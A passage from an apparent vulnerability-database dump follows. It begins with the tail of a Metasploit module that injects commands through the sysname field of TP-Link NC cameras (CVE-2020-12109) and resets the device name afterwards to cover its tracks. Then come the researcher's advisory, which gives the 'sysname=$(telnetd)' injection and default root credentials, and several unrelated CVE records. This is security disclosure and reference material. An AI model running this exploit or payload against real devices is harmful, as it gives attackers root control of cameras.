\n'DefaultOptions' => { 'SSL' => true } \n} \n] \n], \n'DefaultTarget' => 0 \n) \n) \n \nregister_options( \n[ \nOptString.new('USERNAME', [ true, 'The web interface username', 'admin' ]), \nOptString.new('PASSWORD', [ true, 'The web interface password for the specified username', 'admin' ]) \n] \n) \nend \n \ndef login \nuser = datastore['USERNAME'] \npass = Base64.strict_encode64(datastore['PASSWORD']) \nif target.name == 'TP-Link NC260, NC450' \npass = Rex::Text.md5(pass) \nend \n \nprint_status(\"Authenticating with #{user}:#{pass} ...\") \nbegin \nres = send_request_cgi({ \n'uri' => '/login.fcgi', \n'method' => 'POST', \n'vars_post' => { \n'Username' => user, \n'Password' => pass \n} \n}) \nif res.nil? || res.code == 404 \nfail_with(Failure::NoAccess, '/login.fcgi did not reply correctly. Wrong target ip?') \nend \nif res.body =~ /\\\"errorCode\\\"\\:0/ && res.headers.key?('Set-Cookie') && res.body =~ /token/ \nprint_good(\"Logged-in as #{user}\") \n@cookie = res.get_cookies.scan(/\\s?([^, ;]+?)=([^, ;]*?)[;,]/)[0][1] \nprint_good(\"Got cookie: #{@cookie}\") \n@token = res.body.scan(/\"(token)\":\"([^,\"]*)\"/)[0][1] \nprint_good(\"Got token: #{@token}\") \nelse \nfail_with(Failure::NoAccess, \"Login failed with #{user}:#{pass}\") \nend \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unreachable, 'Connection failed') \nend \nend \n \ndef enable_bonjour \nres = send_request_cgi({ \n'uri' => '/setbonjoursetting.fcgi', \n'method' => 'POST', \n'encode_params' => false, \n'cookie' => \"sess=#{@cookie}\", \n'vars_post' => { \n'bonjourState' => '1', \n'token' => @token.to_s \n} \n}) \nreturn res \nrescue ::Rex::ConnectionError \nvprint_error(\"Failed connection to the web server at #{rhost}:#{rport}\") \nreturn nil \nend \n \ndef sys_name(cmd) \nres = send_request_cgi({ \n'uri' => '/setsysname.fcgi', \n'method' => 'POST', \n'encode_params' => true, \n'cookie' => \"sess=#{@cookie}\", \n'vars_post' => { \n'sysname' => cmd, \n'token' => @token.to_s \n} \n}) \nreturn res \nrescue ::Rex::ConnectionError \nvprint_error(\"Failed connection to the web server at #{rhost}:#{rport}\") \nreturn nil \nend \n \ndef execute_command(cmd, _opts = {}) \nprint_status(\"Executing command: #{cmd}\") \nsys_name(\"$(#{cmd})\") \nend \n \ndef exploit \nlogin # Get cookie and csrf token \nenable_bonjour # Enable bonjour service \nexecute_cmdstager # Upload and execute payload \nsys_name('NC200') # Set back an innocent-looking device name \nend \n \nend \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/159222/tp_link_ncxxx_bonjour_command_injection.rb.txt"}, {"lastseen": "2020-08-31T07:08:58", "description": "", "published": "2020-05-01T00:00:00", "type": "packetstorm", "title": "TP-LINK Cloud Cameras NCXXX Bonjour Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-12109"], "modified": "2020-05-01T00:00:00", "id": "PACKETSTORM:157531", "href": "https://packetstormsecurity.com/files/157531/TP-LINK-Cloud-Cameras-NCXXX-Bonjour-Command-Injection.html", "sourceData": "`Vulnerability title: TP-LINK Cloud Cameras NCXXX Bonjour Command Injection \nAuthor: Pietro Oliva \nCVE: CVE-2020-12109 \nVendor: TP-LINK \nProduct: NC200, NC210, NC220, NC230, NC250, NC260, NC450 \nAffected version: NC200 <= 2.1.9 build 200225, NC210 <= 1.0.9 build 200304, \nNC220 <= 1.3.0 build 200304, NC230 <= 1.3.0 build 200304, \nNC250 <= 1.3.0 build 200304, NC260 <= 1.5.2 build 200304, \nNC450 <= 1.5.3 build 200304. \n \nFixed version: NC200 <= 2.1.10 build 200401, NC210 <= 1.0.10 build 200401, \nNC220 <= 1.3.1 build 200401, NC230 <= 1.3.1 build 200401, \nNC250 <= 1.3.1 build 200401, NC260 <= 1.5.3 build_200401, \nNC450 <= 1.5.4 build 200401 \n \nDescription: \nThe issue is located in the swSystemSetProductAliasCheck method of the \nipcamera binary (Called when setting a new alias for the device via \n/setsysname.fcgi), where despite a check on the name length, no other checks \nare in place in order to prevent shell metacharacters from being introduced. \nThe system name would then be used in swBonjourStartHTTP as part of a shell \ncommand where arbitrary commands could be injected and executed as root. \n \nImpact: \nAttackers could exploit this vulnerability to remotely execute commands as root \non affected devices. \n \nExploitation: \nAn attacker would first need to authenticate to the web interface and make a \nrequest such as the following (the request contents might change slightly \nbetween cameras): \n \nPOST /setsysname.fcgi HTTP/1.1 \nHost: x.x.x.x \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 \nContent-Type: application/x-www-form-urlencoded \nCookie: sess=xxxxx \nContent-Length: xxxx \n \nsysname=$(telnetd)&token=xxxxx\" \n \nIn a device where telnetd has not been removed from the release firmware (such \nas NC200), this would spawn the telnetd deamon. Default root/root credentials \ncould then be used to obtain a root shell via telnet. \n \nEvidence: \nThe disassembly of affected code from an NC200 camera is shown below: \n \nsym.swSystemSetProductAliasCheck: \n \n0x0049f1cc lui gp, 0xa \n0x0049f1d0 addiu gp, gp, -0x3ebc \n0x0049f1d4 addu gp, gp, t9 \n0x0049f1d8 addiu sp, sp, -0x28 \n0x0049f1dc sw ra, (var_24h) \n0x0049f1e0 sw fp, (var_20h) \n0x0049f1e4 move fp, sp \n0x0049f1e8 sw gp, (var_10h) \n0x0049f1ec sw a0, (alias_arg) \n0x0049f1f0 lw v0, (alias_arg) \n0x0049f1f4 nop \n,=< 0x0049f1f8 beqz v0, 0x49f218 \n| 0x0049f1fc nop \n| 0x0049f200 lw v0, (alias_arg) \n| 0x0049f204 nop \n| 0x0049f208 lb v0, (v0) \n| 0x0049f20c nop \n,==< 0x0049f210 bnez v0, 0x49f224 \n|| 0x0049f214 nop \n|`-> 0x0049f218 addiu v0, zero, 0x42f \n|,=< 0x0049f21c b 0x49f258 \n|| 0x0049f220 sw v0, (arg_18h) \n`--> 0x0049f224 lw a0, (alias_arg) \n| 0x0049f228 lw t9, -sym.imp.strlen(gp) \n| 0x0049f22c nop \n| 0x0049f230 jalr t9 \n| 0x0049f234 nop \n| 0x0049f238 lw gp, (arg_10h) \n| 0x0049f23c sltiu v0, v0, 0x81 \n,==< 0x0049f240 bnez v0, 0x49f254 \n|| 0x0049f244 nop \n|| 0x0049f248 addiu v0, zero, 0x430 \n,===< 0x0049f24c b 0x49f258 \n||| 0x0049f250 sw v0, (arg_18h) \n|`--> 0x0049f254 sw zero, (arg_18h) \n`-`-> 0x0049f258 lw v0, (arg_18h) \n0x0049f25c move sp, fp \n0x0049f260 lw ra, (var_24h) \n0x0049f264 lw fp, (var_20h) \n0x0049f268 jr ra \n0x0049f26c addiu sp, sp, 0x28 \n \nswBonjourStartHTTP: \n \n0x0043a008 addiu v0, fp, 0x20 \n0x0043a00c move a0, v0 \n0x0043a010 addiu a1, zero, 0x88 \n0x0043a014 lw t9, -sym.swBonjourGetName(gp) ; <= get the system name in fp+20 \n0x0043a018 nop \n0x0043a01c jalr t9 \n0x0043a020 nop \n0x0043a024 lw gp, (arg_10h) \n0x0043a028 addiu v0, fp, 0x20 ; <= put ptr to name in v0 \n0x0043a02c lw a0, -0x7fdc(gp) \n0x0043a030 nop \n0x0043a034 addiu a0, a0, 0xd10 \n; a0 => \"mDNSResponderPosix -n \\\"%s\\\" -t _http._tcp -p %d -x path=/login.html &\" \n0x0043a038 move a1, v0 ; <= a1 points to system name \n0x0043a03c lw a2, (arg_b0h) \n0x0043a040 lw t9, -sym.cmCommand(gp) ; Execute the command \n0x0043a044 nop \n0x0043a048 jalr t9 \n0x0043a04c nop \n \n \nMitigating factors: \n-NC210 Cameras have a filter for \"bad chars\". This means the payload cannot \ncontain any of the following characters: dot(.), at(@), dash(-), underscore(_), \nwhitespace( ), and single quote('). \n-Some cameras do not ship with telnetd, so other methods such as using wget or \ncurl to download a payload from the network might be required to obtain a shell. \n \nRemediation: \nInstall firmware updates provided by the vendor to fix the vulnerability. \nThe latest updates can be found at the following URLs: \n \nhttps://www.tp-link.com/en/support/download/nc200/#Firmware \nhttps://www.tp-link.com/en/support/download/nc210/#Firmware \nhttps://www.tp-link.com/en/support/download/nc220/#Firmware \nhttps://www.tp-link.com/en/support/download/nc230/#Firmware \nhttps://www.tp-link.com/en/support/download/nc250/#Firmware \nhttps://www.tp-link.com/en/support/download/nc260/#Firmware \nhttps://www.tp-link.com/en/support/download/nc450/#Firmware \n \nDisclosure timeline: \n29th March 2020 - Vulnerability reported to vendor. \n10th April 2020 - Patched firmware provided by vendor for verification. \n10th April 2020 - Confirmed the vulnerability was fixed. \n29th April 2020 - Firmware updates released to the public. \n29th April 2020 - Vulnerability details are made public. \n \n \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/157531/tplinkncxxbonjour-inject.txt"}], "zdt": [{"lastseen": "2020-07-19T18:00:24", "description": "TP-LINK Cloud Cameras including products NC200, NC210, NC220, NC230, NC250, NC260, and NC450 suffer from a command injection vulnerability. The issue is located in the swSystemSetProductAliasCheck method of the ipcamera binary (Called when setting a new alias for the device via /setsysname.fcgi), where despite a check on the name length, no other checks are in place in order to prevent shell metacharacters from being introduced. The system name would then be used in swBonjourStartHTTP as part of a shell command where arbitrary commands could be injected and executed as root.", "edition": 1, "published": "2020-05-06T00:00:00", "title": "TP-LINK Cloud Cameras NCXXX Bonjour Command Injection Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-12109"], "modified": "2020-05-06T00:00:00", "id": "1337DAY-ID-34369", "href": "https://0day.today/exploit/description/34369", "sourceData": "Vulnerability title: TP-LINK Cloud Cameras NCXXX Bonjour Command Injection\r\nAuthor: Pietro Oliva\r\nCVE: CVE-2020-12109\r\nVendor: TP-LINK\r\nProduct: NC200, NC210, NC220, NC230, NC250, NC260, NC450\r\nAffected version: NC200 <= 2.1.9 build 200225, NC210 <= 1.0.9 build 200304,\r\n NC220 <= 1.3.0 build 200304, NC230 <= 1.3.0 build 200304,\r\n NC250 <= 1.3.0 build 200304, NC260 <= 1.5.2 build 200304,\r\n NC450 <= 1.5.3 build 200304.\r\n\r\nFixed version: NC200 <= 2.1.10 build 200401, NC210 <= 1.0.10 build 200401,\r\n NC220 <= 1.3.1 build 200401, NC230 <= 1.3.1 build 200401,\r\n NC250 <= 1.3.1 build 200401, NC260 <= 1.5.3 build_200401,\r\n NC450 <= 1.5.4 build 200401\r\n\r\nDescription:\r\nThe issue is located in the swSystemSetProductAliasCheck method of the\r\nipcamera binary (Called when setting a new alias for the device via\r\n/setsysname.fcgi), where despite a check on the name length, no other checks\r\nare in place in order to prevent shell metacharacters from being introduced.\r\nThe system name would then be used in swBonjourStartHTTP as part of a shell\r\ncommand where arbitrary commands could be injected and executed as root.\r\n\r\nImpact:\r\nAttackers could exploit this vulnerability to remotely execute commands as root\r\non affected devices.\r\n\r\nExploitation:\r\nAn attacker would first need to authenticate to the web interface and make a\r\nrequest such as the following (the request contents might change slightly\r\nbetween cameras):\r\n\r\nPOST /setsysname.fcgi HTTP/1.1\r\nHost: x.x.x.x\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: sess=xxxxx\r\nContent-Length: xxxx\r\n\r\nsysname=$(telnetd)&token=xxxxx\"\r\n\r\nIn a device where telnetd has not been removed from the release firmware (such\r\nas NC200), this would spawn the telnetd deamon. Default root/root credentials\r\ncould then be used to obtain a root shell via telnet.\r\n\r\nEvidence:\r\nThe disassembly of affected code from an NC200 camera is shown below:\r\n\r\nsym.swSystemSetProductAliasCheck:\r\n\r\n 0x0049f1cc lui gp, 0xa\r\n 0x0049f1d0 addiu gp, gp, -0x3ebc\r\n 0x0049f1d4 addu gp, gp, t9\r\n 0x0049f1d8 addiu sp, sp, -0x28\r\n 0x0049f1dc sw ra, (var_24h)\r\n 0x0049f1e0 sw fp, (var_20h)\r\n 0x0049f1e4 move fp, sp\r\n 0x0049f1e8 sw gp, (var_10h)\r\n 0x0049f1ec sw a0, (alias_arg)\r\n 0x0049f1f0 lw v0, (alias_arg)\r\n 0x0049f1f4 nop\r\n ,=< 0x0049f1f8 beqz v0, 0x49f218\r\n | 0x0049f1fc nop\r\n | 0x0049f200 lw v0, (alias_arg)\r\n | 0x0049f204 nop\r\n | 0x0049f208 lb v0, (v0)\r\n | 0x0049f20c nop\r\n ,==< 0x0049f210 bnez v0, 0x49f224\r\n || 0x0049f214 nop\r\n |`-> 0x0049f218 addiu v0, zero, 0x42f\r\n |,=< 0x0049f21c b 0x49f258\r\n || 0x0049f220 sw v0, (arg_18h)\r\n `--> 0x0049f224 lw a0, (alias_arg)\r\n | 0x0049f228 lw t9, -sym.imp.strlen(gp)\r\n | 0x0049f22c nop\r\n | 0x0049f230 jalr t9\r\n | 0x0049f234 nop\r\n | 0x0049f238 lw gp, (arg_10h)\r\n | 0x0049f23c sltiu v0, v0, 0x81\r\n ,==< 0x0049f240 bnez v0, 0x49f254\r\n || 0x0049f244 nop\r\n || 0x0049f248 addiu v0, zero, 0x430\r\n,===< 0x0049f24c b 0x49f258\r\n||| 0x0049f250 sw v0, (arg_18h)\r\n|`--> 0x0049f254 sw zero, (arg_18h)\r\n`-`-> 0x0049f258 lw v0, (arg_18h)\r\n 0x0049f25c move sp, fp\r\n 0x0049f260 lw ra, (var_24h)\r\n 0x0049f264 lw fp, (var_20h)\r\n 0x0049f268 jr ra\r\n 0x0049f26c addiu sp, sp, 0x28\r\n\r\nswBonjourStartHTTP:\r\n\r\n0x0043a008 addiu v0, fp, 0x20\r\n0x0043a00c move a0, v0\r\n0x0043a010 addiu a1, zero, 0x88\r\n0x0043a014 lw t9, -sym.swBonjourGetName(gp) ; <= get the system name in fp+20\r\n0x0043a018 nop\r\n0x0043a01c jalr t9\r\n0x0043a020 nop\r\n0x0043a024 lw gp, (arg_10h)\r\n0x0043a028 addiu v0, fp, 0x20 ; <= put ptr to name in v0\r\n0x0043a02c lw a0, -0x7fdc(gp)\r\n0x0043a030 nop\r\n0x0043a034 addiu a0, a0, 0xd10\r\n; a0 => \"mDNSResponderPosix -n \\\"%s\\\" -t _http._tcp -p %d -x path=/login.html &\"\r\n0x0043a038 move a1, v0 ; <= a1 points to system name\r\n0x0043a03c lw a2, (arg_b0h)\r\n0x0043a040 lw t9, -sym.cmCommand(gp) ; Execute the command\r\n0x0043a044 nop\r\n0x0043a048 jalr t9\r\n0x0043a04c nop\r\n\r\n\r\nMitigating factors:\r\n-NC210 Cameras have a filter for \"bad chars\". This means the payload cannot\r\ncontain any of the following characters: dot(.), at(@), dash(-), underscore(_),\r\nwhitespace( ), and single quote(').\r\n-Some cameras do not ship with telnetd, so other methods such as using wget or\r\ncurl to download a payload from the network might be required to obtain a shell.\r\n\r\nRemediation:\r\nInstall firmware updates provided by the vendor to fix the vulnerability.\r\nThe latest updates can be found at the following URLs:\r\n\r\nhttps://www.tp-link.com/en/support/download/nc200/#Firmware\r\nhttps://www.tp-link.com/en/support/download/nc210/#Firmware\r\nhttps://www.tp-link.com/en/support/download/nc220/#Firmware\r\nhttps://www.tp-link.com/en/support/download/nc230/#Firmware\r\nhttps://www.tp-link.com/en/support/download/nc250/#Firmware\r\nhttps://www.tp-link.com/en/support/download/nc260/#Firmware\r\nhttps://www.tp-link.com/en/support/download/nc450/#Firmware\r\n\r\nDisclosure timeline:\r\n29th March 2020 - Vulnerability reported to vendor.\r\n10th April 2020 - Patched firmware provided by vendor for verification.\r\n10th April 2020 - Confirmed the vulnerability was fixed.\r\n29th April 2020 - Firmware updates released to the public.\r\n29th April 2020 - Vulnerability details are made public.\n\n# 0day.today [2020-07-19] #", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34369"}], "cve": [{"lastseen": "2020-10-03T12:55:48", "description": "Certain TP-Link devices allow Command Injection. This affects NC200 2.1.9 build 200225, NC210 1.0.9 build 200304, NC220 1.3.0 build 200304, NC230 1.3.0 build 200304, NC250 1.3.0 build 200304, NC260 1.5.2 build 200304, and NC450 1.5.3 build 200304.", "edition": 4, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-04T16:15:00", "title": "CVE-2020-12109", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-12109"], "modified": "2020-09-18T19:15:00", "cpe": ["cpe:/o:tp-link:nc210_firmware:1.0.4", "cpe:/o:tp-link:nc250_firmware:1.2.1", "cpe:/o:tp-link:nc260_firmware:1.5.2", "cpe:/o:tp-link:nc220_firmware:1.2.0", "cpe:/o:tp-link:nc450_firmware:1.3.4", "cpe:/o:tp-link:nc260_firmware:1.5.0", "cpe:/o:tp-link:nc250_firmware:1.0.8", "cpe:/o:tp-link:nc450_firmware:1.5.3", "cpe:/o:tp-link:nc200_firmware:2.1.6", "cpe:/o:tp-link:nc200_firmware:2.1.9", "cpe:/o:tp-link:nc230_firmware:1.3.0", "cpe:/o:tp-link:nc210_firmware:1.0.9", "cpe:/o:tp-link:nc250_firmware:1.0.10", "cpe:/o:tp-link:nc220_firmware:1.3.0", "cpe:/o:tp-link:nc260_firmware:1.0.6", "cpe:/o:tp-link:nc260_firmware:1.0.5", "cpe:/o:tp-link:nc250_firmware:1.3.0", "cpe:/o:tp-link:nc450_firmware:1.0.15", "cpe:/o:tp-link:nc230_firmware:1.0.3", "cpe:/o:tp-link:nc230_firmware:1.2.1", "cpe:/o:tp-link:nc450_firmware:1.1.2", "cpe:/o:tp-link:nc210_firmware:1.0.3", "cpe:/o:tp-link:nc260_firmware:1.4.1"], "id": "CVE-2020-12109", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12109", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:tp-link:nc220_firmware:1.2.0:170516:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc230_firmware:1.2.1:170515:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc220_firmware:1.3.0:180105:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc260_firmware:1.0.5:160804:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc200_firmware:2.1.9:200225:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc250_firmware:1.0.10:160321:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc210_firmware:1.0.3:160229:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc260_firmware:1.5.2:200304:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc250_firmware:1.2.1:170515:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc260_firmware:1.5.0:181123:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc230_firmware:1.3.0:200304:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc200_firmware:2.1.6:160108_b:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc210_firmware:1.0.9:200304:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc250_firmware:1.0.8:160108:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc450_firmware:1.5.3:200304:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc450_firmware:1.1.2:161013:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc220_firmware:1.3.0:200304:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc260_firmware:1.0.6:161114:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc260_firmware:1.4.1:180720:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc450_firmware:1.3.4:171130:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc210_firmware:1.0.4:160412:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc230_firmware:1.0.3:160108:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc450_firmware:1.0.15:160920:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc250_firmware:1.3.0:200304:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:01:15", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:28", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T21:41:41", "description": "A Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL pointer dereference in GetOutboundPinholeTimeout in upnpsoap.c for rem_port.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-05-15T23:29:00", "title": "CVE-2019-12109", "type": "cve", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12109"], "modified": "2020-09-28T20:15:00", "cpe": ["cpe:/a:miniupnp_project:miniupnpd:2.1"], "id": "CVE-2019-12109", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12109", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:miniupnp_project:miniupnpd:2.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:10", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:46", "description": "The default configuration in Apache Cassandra 3.8 through 3.11.1 binds an unauthenticated JMX/RMI interface to all network interfaces, which allows remote attackers to execute arbitrary Java code via an RMI 